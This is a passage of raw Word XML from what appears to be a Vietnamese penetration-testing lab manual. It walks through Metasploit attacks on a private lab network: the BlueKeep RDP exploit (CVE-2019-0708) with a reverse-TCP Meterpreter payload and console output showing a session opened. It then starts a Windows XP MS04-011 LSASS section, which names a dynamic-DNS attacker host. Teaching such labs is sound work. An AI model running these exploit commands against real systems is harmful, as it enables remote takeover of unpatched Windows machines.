        <w:t xml:space="preserve"> có </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">địa chỉ IP </w:t>
      </w:r>
      <w:r w:rsidR="0086604A">
        <w:t xml:space="preserve">RHOSTS = </w:t>
      </w:r>
      <w:r>
        <w:t>192</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>0, 192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0086604A">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="28B21071" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc145594629" w:id="30"/>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="522D8D0D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="388908EF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="7C289129" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="3B55D804" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="674CF0AF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="0DBA649C" w14:textId="71F2BDBD">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>msf6 &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve"> ping 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidR="003301DE">
        <w:rPr/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="5119AEB4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>rdp</w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>/cve_2019_0708_bluekeep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5A4E65A9" w:rsidP="0E33AEE1" w:rsidRDefault="5A4E65A9" w14:paraId="69EC2379" w14:textId="3C405B83">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="5A4E65A9">
        <w:rPr/>
        <w:t>show info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="6ED19508" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="5BCDFD9C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E788E86" w:rsidP="0E33AEE1" w:rsidRDefault="6E788E86" w14:paraId="566671F3">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="6E788E86">
        <w:rPr/>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="0887271C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t xml:space="preserve">set target </w:t>
      </w:r>
      <w:r w:rsidR="00B04363">
        <w:rPr/>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="43F4240E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="0818007C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="1BD74EE5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] Started reverse TCP handler on 192.168.1.10:4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="2DFA635C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] 192.168.1.110:3389 - Running automatic check ("set AutoCheck false" to disable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="79C294CA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] 192.168.1.110:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="38D2F774" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] 192.168.1.110:3389    - Detected RDP on 192.168.1.110:3389    (Windows version: N/A) (Requires NLA: No)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="106BF08A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[+] 192.168.1.110:3389    - The target is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="17F797FB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] 192.168.1.110:3389    - Scanned 1 of 1 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="108E345B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[+] 192.168.1.110:3389 - The target is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="3A7B3511" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] Sending stage (200774 bytes) to 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="23AF94E2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[-] 192.168.1.110:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::        RdpCommunicationError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00BB0A96" w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="21EF756D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>[*] Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B04363" w:rsidP="00B04363" w:rsidRDefault="00B04363" w14:paraId="7A788979" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0A96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) &gt; [*] Meterpreter session 1 opened (192.168.1.10:4444 -&gt; 192.168        .1.110:4326) at 2023-09-12 19:27:26 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086604A" w:rsidP="0086604A" w:rsidRDefault="0086604A" w14:paraId="1845CC18" w14:textId="3AC14E17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc145594630" w:id="31"/>
      <w:r>
        <w:t>Note</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="35A69C3E" w:rsidP="3CE16CD3" w:rsidRDefault="35A69C3E" w14:paraId="4277E944" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>use windows/rdp/cve_2019_0708_bluekeep_rce </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35A69C3E" w:rsidP="3CE16CD3" w:rsidRDefault="35A69C3E" w14:paraId="16784EF9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35A69C3E" w:rsidP="3CE16CD3" w:rsidRDefault="35A69C3E" w14:paraId="643C8B4C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set groomsize 50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35A69C3E" w:rsidP="3CE16CD3" w:rsidRDefault="35A69C3E" w14:paraId="01DA3B6F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35A69C3E" w:rsidP="3CE16CD3" w:rsidRDefault="35A69C3E" w14:paraId="7A05EE95" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35A69C3E" w:rsidP="3CE16CD3" w:rsidRDefault="35A69C3E" w14:paraId="1518DC09" w14:textId="4BC6A6D9">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidR="565D082C">
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35A69C3E" w:rsidP="3CE16CD3" w:rsidRDefault="35A69C3E" w14:paraId="7BA79136" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="03EF27CC" w14:textId="3FA6B2DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20808951" w:id="32"/>
      <w:bookmarkStart w:name="_Toc65834499" w:id="33"/>
      <w:bookmarkStart w:name="_Toc572123550" w:id="34"/>
      <w:bookmarkStart w:name="_Toc145594631" w:id="35"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Tấn công Windows XP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="3CE16CD3" w:rsidR="00A6227C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3" w:rsidR="00D05D08">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="3CE16CD3" w:rsidR="00A6227C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ms04_011_lsass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="000634C0" w:rsidRDefault="3B9C5DF7" w14:paraId="08D66B1E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc20808952" w:id="36"/>
      <w:bookmarkStart w:name="_Toc840339183" w:id="37"/>
      <w:bookmarkStart w:name="_Toc145594632" w:id="38"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Kịch bản</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="24D8259B" w14:textId="7AC48C82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Máy</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="026CC99B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="32CA02D0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.ddns.net</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Địa</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>chỉ</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.168.1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LHOST) </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sẽ</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tấn công </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>máy</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Win XP </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Địa</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>chỉ</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="00F16D27">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP 192</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.168.1.110, 192.168.1.111</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RHOST) </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dựa</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>trên</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>lổ</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>hổng</w:t>
      </w:r>
      <w:r w:rsidRPr="7C6BFC6E" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lsass_ms04_011.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="13277EA2" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Đây là lỗi tràn stack trong dịch vụ LSA (Local Security Authority). Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm soát việc chứng thực của cả client và server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="000634C0" w:rsidRDefault="0093673A" w14:paraId="6D31BFBA" w14:textId="1545994B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc969408580" w:id="39"/>
      <w:bookmarkStart w:name="_Toc145594633" w:id="40"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>hực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B73BDE" w:rsidP="00B73BDE" w:rsidRDefault="00B73BDE" w14:paraId="51D24CCB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B73BDE" w:rsidP="00B73BDE" w:rsidRDefault="00B73BDE" w14:paraId="0BD8E4CF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B73BDE" w:rsidP="00B73BDE" w:rsidRDefault="00B73BDE" w14:paraId="1ACEA39B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00B73BDE" w:rsidP="00B73BDE" w:rsidRDefault="00B73BDE" w14:paraId="21715B0B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00E3618C" w:rsidP="00E3618C" w:rsidRDefault="00E3618C" w14:paraId="3816BBE7" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00E3618C" w:rsidP="00E3618C" w:rsidRDefault="00E3618C" w14:paraId="5B33713F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
